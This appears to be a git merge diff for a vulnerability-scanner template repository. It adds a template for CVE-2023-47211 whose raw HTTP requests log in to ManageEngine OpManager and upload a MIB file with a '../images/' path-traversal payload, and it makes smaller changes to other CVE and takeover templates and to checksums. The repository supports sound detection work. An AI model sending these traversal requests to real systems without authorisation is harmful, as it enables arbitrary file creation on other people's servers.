Merge branch 'main' into reactapp-env

.github/workflows/templates-sync.yml

@@ -82,6 +82,7 @@ on:
     - 'http/cves/2023/CVE-2023-22527.yaml'
     - 'http/cves/2023/CVE-2023-27639.yaml'
     - 'http/cves/2023/CVE-2023-27640.yaml'
+    - 'http/cves/2023/CVE-2023-47211.yaml'
     - 'http/cves/2023/CVE-2023-48023.yaml'
     - 'http/cves/2023/CVE-2023-6023.yaml'
     - 'http/cves/2023/CVE-2023-6875.yaml'

.new-additions

@@ -77,6 +77,7 @@ http/cves/2018/CVE-2018-10942.yaml
 http/cves/2023/CVE-2023-22527.yaml
 http/cves/2023/CVE-2023-27639.yaml
 http/cves/2023/CVE-2023-27640.yaml
+http/cves/2023/CVE-2023-47211.yaml
 http/cves/2023/CVE-2023-48023.yaml
 http/cves/2023/CVE-2023-6023.yaml
 http/cves/2023/CVE-2023-6875.yaml

cves.json

@@ -2232,6 +2232,7 @@
 {"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"}
 {"ID":"CVE-2023-46805","Info":{"Name":"Ivanti ICS - Authentication Bypass","Severity":"high","Description":"An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2023/CVE-2023-46805.yaml"}
 {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
+{"ID":"CVE-2023-47211","Info":{"Name":"ManageEngine OpManager - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-47211.yaml"}
 {"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
 {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"}
 {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"}

cves.json-checksum.txt

@@ -1 +1 @@
-05564255e098e325ecbfdfd43751f476
+c95ebe1b9b7034e3fe834994f5aaf6ba

http/cves/2021/CVE-2021-39327.yaml

@@ -45,6 +45,12 @@ http:
           - '=================='
         condition: and
 
+      - type: regex
+        negative: true
+        part: body
+        regex:
+          - '^BPS\sDB\sBACKUP\sLOG\r\n==================\r\n==================\r\n\r\n$'
+
       - type: word
         part: header
         words:
@@ -53,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100af3dd0939f62b4cb86987680c8af5e298418eb98e823b6fcec9e342d1a27c69e02206c8d9f34d0eedd307ab441de49c36ae76fce1baeae4b5d4e5ce6ba570fba4ca9:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a0048304602210086b49046ea527338562988b0b54d2d60e2df3f6d3e9ec183a2f59cc54041e4ba022100b6cbd53cc294fac59fed7a4386be9d3b13e3cdebfd3eb1c20f4a895e1d8c2484:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-47211.yaml

@@ -0,0 +1,114 @@
+id: CVE-2023-47211
+
+info:
+  name: ManageEngine OpManager - Directory Traversal
+  author: gy741
+  severity: high
+  description: |
+    A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
+  reference:
+    - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-47211
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 8.6
+    cve-id: CVE-2023-47211
+    cwe-id: CWE-22
+    epss-score: 0.000610000
+    epss-percentile: 0.238320000
+    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    shodan-query: http.title:"OpManager Plus"
+  tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi
+
+http:
+  - raw:
+      - |
+        POST /two_factor_auth HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        j_username={{username}}&j_password={{password}}
+
+      - |
+        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
+        Host: {{Hostname}}
+        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
+        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262
+
+        -----------------------------372334936941313273904263503262
+        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
+        Content-Type: text/plain
+
+        ../images/karas DEFINITIONS ::= BEGIN
+
+
+        IMPORTS
+            enterprises
+                FROM RFC1155-SMI;
+
+        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
+        software        OBJECT IDENTIFIER ::= { microsoft 1 }
+        systems         OBJECT IDENTIFIER ::= { software 1 }
+        os              OBJECT IDENTIFIER ::= { systems 3 }
+        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
+        windows         OBJECT IDENTIFIER ::= { os 2 }
+        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
+        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
+        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }
+
+        END
+
+        -----------------------------372334936941313273904263503262--
+
+      - |
+        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
+        Host: {{Hostname}}
+        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
+        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262
+
+        -----------------------------372334936941313273904263503262
+        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
+        Content-Type: text/plain
+
+        ../images/karas DEFINITIONS ::= BEGIN
+
+
+        IMPORTS
+            enterprises
+                FROM RFC1155-SMI;
+
+        microsoft       OBJECT IDENTIFIER ::= { enterprises 311 }
+        software        OBJECT IDENTIFIER ::= { microsoft 1 }
+        systems         OBJECT IDENTIFIER ::= { software 1 }
+        os              OBJECT IDENTIFIER ::= { systems 3 }
+        windowsNT       OBJECT IDENTIFIER ::= { os 1 }
+        windows         OBJECT IDENTIFIER ::= { os 2 }
+        workstation     OBJECT IDENTIFIER ::= { windowsNT 1 }
+        server          OBJECT IDENTIFIER ::= { windowsNT 2 }
+        dc              OBJECT IDENTIFIER ::= { windowsNT 3 }
+
+        END
+
+        -----------------------------372334936941313273904263503262--
+
+    host-redirects: true
+    max-redirects: 3
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains(body, "MIBFile with same name already exists")'
+        condition: and
+
+    extractors:
+      - type: regex
+        name: x_zcsrf_token
+        group: 1
+        part: header
+        regex:
+          - 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
+        internal: true
+# digest: 4a0a00473045022100d0db16ab8c46ac09c0a481c477c237858642663e12d9ddd8734591713833a2a7022026241af2d76fb1c58e6b80046a5ae5c231df7ac82ce627e4cc345bb039b87a09:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-0204.yaml

@@ -19,7 +19,7 @@ info:
   metadata:
     verified: true
     max-request: 1
-    shodan-query: http.favicon.hash:1484947000
+    shodan-query: http.favicon.hash:1484947000,1828756398,1170495932 || html:InvalidBrowser.xhtml
   tags: cve,cve2024,auth-bypass,goanywhere
 
 http:
@@ -39,4 +39,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502200c0737654cbbb14c8e7da4470731e92dace06ddccf481af6ed760cb99c5d75e5022100be491a724570489903e091ba728fa5d7fee4ef4cefd643d1c89ca314edd55f32:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402204cf4124e1cf41e749682dfd2780edee610ad177d8f87b7e5adfaad7e1deaf55602200b1c67b0a6ee6be3e4fc0b8a89ae9672ae6995e4dce26b247f1881f6b4954312:922c64590222798bb761d5b6d8e72950

http/takeovers/flywheel-takeover.yaml

@@ -1,34 +0,0 @@
-id: flywheel-takeover
-
-info:
-  name: Flywheel Subdomain Takeover
-  author: smaranchand
-  severity: high
-  description: Flywheel takeover was detected.
-  reference:
-    - https://smaranchand.com.np/2021/06/flywheel-subdomain-takeover
-  metadata:
-    verified: true
-    max-request: 1
-    shodan-query: http.html:"Flywheel"
-  tags: takeover,flywheel
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: or
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "We're sorry, you've landed on a page that is hosted by Flywheel"
-          - "<h1>Oops! That's not the site<br>you're looking&nbsp;for.</h1>"
-        condition: and
-
-      - type: word
-        part: body
-        words:
-          - "We are sorry, you've landed on a page that is hosted by Flywheel"
-# digest: 4a0a00473045022100c65c64d3a7226e36ae3cf134895cc98fb03a04cdfc9dc431eeb61696a096dd380220464ee36598416ac00838699b717d73b587432b2ed738fe71b2b5da09cc272ab6:922c64590222798bb761d5b6d8e72950

http/takeovers/webflow-takeover.yaml

@@ -1,32 +0,0 @@
-id: webflow-takeover
-
-info:
-  name: webflow takeover detection
-  author: pdteam,keni0k
-  severity: high
-  description: webflow takeover was detected.
-  reference:
-    - https://github.com/EdOverflow/can-i-take-over-xyz/issues/44
-    - https://saurabhsanmane.medium.com/subdomain-takeover-using-webflow-service-5a7b9efcf172
-  metadata:
-    max-request: 1
-  tags: takeover
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - Host != ip
-
-      - type: word
-        words:
-          - "The page you are looking for doesn't exist or has been moved."
-          - "The page you are looking for doesn't exist or has been moved"
-          - <p class="description">The page you are looking for doesn't exist or has been moved.</p>
-        condition: or
-# digest: 490a0046304402206aed9372445d22034b81f846be32bf9c3b3274420a26c29037fd09e1eba21866022034d5c6a742ebe4e8ef4cd8494567c6650f44dfd236288046400e794713646e86:922c64590222798bb761d5b6d8e72950

templates-checksum.txt

@@ -102,8 +102,8 @@ config/osint.yml:846ae0c6f62f669b094a5e1dd47843fd5ff32395
 config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196
 config/recommended.yml:adcd4e1f0ef7b6b8c57fddbdda3ebf2314a8fa9b
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:ef9364efbde5e7993f18e9b50723f1050dc9d75e
-cves.json-checksum.txt:196f9663089b6233c678f1c7e691bbc39557de82
+cves.json:7be9d972493b1a4c98165486c82e45afbf776118
+cves.json-checksum.txt:24b707d1313a1689aebe90bc748be2aabd5f732b
 dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4
 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24
 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2
@@ -2128,7 +2128,7 @@ http/cves/2021/CVE-2021-39312.yaml:64d165e28ec5a707dc634b224ac54e3104ed2800
 http/cves/2021/CVE-2021-39316.yaml:8ca434b922003596d8237b873b11bb21b5518ed8
 http/cves/2021/CVE-2021-39320.yaml:ee3b0a1e22774e2a32695553daadc042c88e7fe8
 http/cves/2021/CVE-2021-39322.yaml:cd7b1f3f9db49e2190a27a9ae442989fd47161e1
-http/cves/2021/CVE-2021-39327.yaml:8ace5ce89ee650d719d2e75111d1127c4bdc2433
+http/cves/2021/CVE-2021-39327.yaml:82ac7a9c777b6ccbd979552187b525f3e8e2943f
 http/cves/2021/CVE-2021-39350.yaml:ffe96a09f03658f9e3c200a4871f11ea1a1f84ef
 http/cves/2021/CVE-2021-39433.yaml:07e2f35b5d4dda5a3b884a39e5d2cbba43f41a24
 http/cves/2021/CVE-2021-39501.yaml:71ed3e4cb94325f5aa287d47a82e9ec44a3f7791
@@ -2988,6 +2988,7 @@ http/cves/2023/CVE-2023-46574.yaml:d39bb36ad3ad2ca72034abe7139d9ecb3d131bb6
 http/cves/2023/CVE-2023-46747.yaml:87070639881b268dd3e220d7d259dd90733c65f5
 http/cves/2023/CVE-2023-46805.yaml:f1bdb094c431bd1128a3630f865050617fc62016
 http/cves/2023/CVE-2023-4714.yaml:da97fe934a7bced5b02a8cad6acb4222a7b41905
+http/cves/2023/CVE-2023-47211.yaml:83094654f4cad6c39d23fcfe372cf55a05a349a5
 http/cves/2023/CVE-2023-47246.yaml:0cbbf14af567525b94bb41bc6be327c666ce44ba
 http/cves/2023/CVE-2023-48023.yaml:232bb9e1cb23b2c52849c96f58bcc856c3422bed
 http/cves/2023/CVE-2023-49070.yaml:bc09f7344ea3ebf3d441c41d708a7edca91c2dd2
@@ -3016,7 +3017,7 @@ http/cves/2023/CVE-2023-6623.yaml:62b2101ac20cbd8e8d951d835db41ebc8167e217
 http/cves/2023/CVE-2023-6634.yaml:2c1b9d81bc80a75902686df1405ff1de1336538d
 http/cves/2023/CVE-2023-6875.yaml:f867e6ef03e3266d1cec3d9ced107c917f76a98a
 http/cves/2023/CVE-2023-7028.yaml:1372fe3d2ddf8e3cd3960bcd60cbc6e4d438eb81
-http/cves/2024/CVE-2024-0204.yaml:2868f41485c7f25ece52717011b0ca726e322efd
+http/cves/2024/CVE-2024-0204.yaml:a496161a6425754e7ee8cd623d473709f3862912
 http/cves/2024/CVE-2024-0352.yaml:6a6fc846f6b5486d7e76f66a3bbd8f367d52f077
 http/cves/2024/CVE-2024-21887.yaml:ba5ec455781639fc9679d3a6b37ba784f87918fe
 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce
@@ -5087,7 +5088,7 @@ http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac
 http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d
 http/misconfiguration/misconfigured-docker.yaml:f69b164e183b7c668ba054389e77c6aa3cc25fb6
 http/misconfiguration/missing-sri.yaml:1bc66d65f6b661a47fc8925571630064bbcd8e40
-http/misconfiguration/mixed-active-content.yaml:dfcfc0e7e3a735db753079828af5251165b01c53
+http/misconfiguration/mixed-active-content.yaml:1a958c89b06668be58457e142802ce450ec76e33
 http/misconfiguration/mixed-passive-content.yaml:58ad91895597b997aadc184d4489f699e8b886dc
 http/misconfiguration/mlflow-unauth.yaml:b4493ff237b1e91ad2445c6d48b5908294501c08
 http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8
@@ -5948,7 +5949,6 @@ http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452
 http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3
 http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87
 http/takeovers/flexbe-takeover.yaml:beb769a298f11ffc28a49fbdc3f9e15c4d22a181
-http/takeovers/flywheel-takeover.yaml:61d2bc14e417d1dca72d6c392f1e8df707b28300
 http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb
 http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68
 http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd
@@ -5996,7 +5996,6 @@ http/takeovers/uptimerobot-takeover.yaml:491f4c81a2351d275943abe78437d45010346ef
 http/takeovers/uservoice-takeover.yaml:cfd1730b418655f4ef16ce1fd29ac406af3ac472
 http/takeovers/vend-takeover.yaml:61af84b5ce0e9de0f9657e64c793e8c1f22110c6
 http/takeovers/vercel-takeover.yaml:881400eef9e2d67febebc5bbb0ae8e8d40d190dd
-http/takeovers/webflow-takeover.yaml:04ee1fc244dea4b56e52a51b8833f3067055eccc
 http/takeovers/wishpond-takeover.yaml:59ed0bc6dabc39d9915c45bea80c75ad96ee00c3
 http/takeovers/wix-takeover.yaml:d3f8931c10d51d15a048f8ccd9c603b5f5164b5d
 http/takeovers/wordpress-takeover.yaml:6943a0158783833fd1797e7500e985be38acaefd
@@ -7857,7 +7856,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
 ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831
 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4
-templates-checksum.txt:d3136794c21df11cec97d887307db544b7c476c5
+templates-checksum.txt:a230836ff778691b2388b8d6ffbe76b64a0e7985
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4